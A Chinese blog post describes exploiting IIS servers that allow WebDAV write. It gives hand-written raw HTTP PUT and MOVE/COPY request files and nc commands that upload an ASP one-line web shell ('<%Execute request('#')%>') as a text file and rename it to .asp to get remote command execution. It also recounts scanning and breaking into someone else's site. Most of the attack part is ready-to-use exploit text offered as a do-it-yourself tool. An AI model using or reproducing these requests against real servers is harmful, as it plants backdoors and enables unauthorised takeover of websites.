很老的东西了，严格的说不是漏洞，只是设置不善造成的Bug。八百年遇不到一会，结果前几天不幸碰上了。
用JSKY扫描人家的站，结果扫描器居然直接把人家整站给删了= =#(这也是百年不遇吧....囧，我猜JSKY用的参数一定是“/”)。

还好，最后搞进去把人家的站恢复了，真惊险。还义务帮他补漏洞，删后门......

其中用到了IIS写权限利用工具，桂林老兵版的没带身上，网上下到了zwell版的，结果没成功，最后自己动手写了一个手动版的，看来还是“自己动手，丰衣足食”哇，呼呼。

分别保存下面两个TXT文件。

//PUT.TXT
PUT /zerosoul.txt HTTP/1.1
HOST: www.xxx.com
Content-Length: 24

<%Execute request(’#’)%>

//MOVE.TXT
MOVE /zerosoul.txt HTTP/1.1
HOST: www.xxx.com
Destination: http://www.xxx.com/zerosoul.asp


(别忘了上面有两下回车)
然后在CMD分别输入以下命令即可:

c:\>nc www.xxx.com 80<PUT.TXT
c:\>nc www.xxx.com 80<MOVE.TXT

然后就得到了地址为http://www.xxx.com/zerosoul.asp的一句话。

通过上面文本的内容，我们可以轻易看出IIS写权限是怎么利用的:

1.使用PUT方式上传后缀名为TXT的一句话马(不能直接上传IIS能解析的文件)。
2.使用MOVE方式把后缀改成ASP(这里用COPY也是可以的哈)。

这个手动版的利用工具虽然不能有已经做好的EXE工具那么傻瓜，但我觉得使用它的时候我们能自己控制所有内容，而且能轻易的理解这个bug利用的原理，然后即使在下不到工具的场合，我们也可以自己轻易写一个出来，呵呵。

网上都说只要打开IIS的“写入”就能利用，但是我在2003虚拟机里面一直没测试成功，在XP的IIS5里面测试成功PUT，但MOVE不成功，文件夹权限我都设置的everyone完全控制了，所以应该还有其他地方的原因。

一些补充
//OPTIONS.TXT 可以查看服务器支持哪些Method
OPTIONS / HTTP/1.1
HOST: www.xxx.com



//COPY.TXT MOVE不行可以用这个试试
COPY /zerosoul.txt HTTP/1.1
HOST: www.xxx.com
Destination: http://www.xxx.com/zerosoul.asp

http://hi.baidu.com/isbx/blog/item/7fc2b035f595ad82a71e1211.html